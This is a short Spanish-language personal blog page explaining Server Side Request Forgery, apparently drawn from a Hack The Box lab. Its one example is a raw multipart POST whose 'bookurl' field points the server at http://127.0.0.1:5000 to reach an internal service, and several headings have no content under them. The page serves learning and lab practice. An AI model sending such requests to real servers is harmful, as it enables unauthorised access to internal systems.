Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

Server Side Request Forgery (SSRF)

¿Qué es SSRF?

La vulnerabilidad Server Side Request Forgery (SSRF) ocurre cuando un atacante puede manipular un servidor para que realice solicitudes HTTP a recursos internos o externos que normalmente no serían accesibles para el atacante.

Impacto

Un ataque SSRF puede permitir:

Ejemplo

POST /upload-cover HTTP/1.1

Host: editorial.htb

Content-Length: 307

Accept-Language: en-US,en;q=0.9

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ7BYZLc1jmNjS53B

Accept: */*

Origin: http://editorial.htb

Referer: http://editorial.htb/upload

Accept-Encoding: gzip, deflate, br

Connection: keep-alive



------WebKitFormBoundaryQ7BYZLc1jmNjS53B

Content-Disposition: form-data; name="bookurl"



http://127.0.0.1:5000

------WebKitFormBoundaryQ7BYZLc1jmNjS53B

Content-Disposition: form-data; name="bookfile"; filename=""

Content-Type: application/octet-stream





------WebKitFormBoundaryQ7BYZLc1jmNjS53B--

Comandos útiles para pruebas SSRF

Herramientas útiles

Payloads comunes

Recursos adicionales

SSRF Cheatsheet ayudas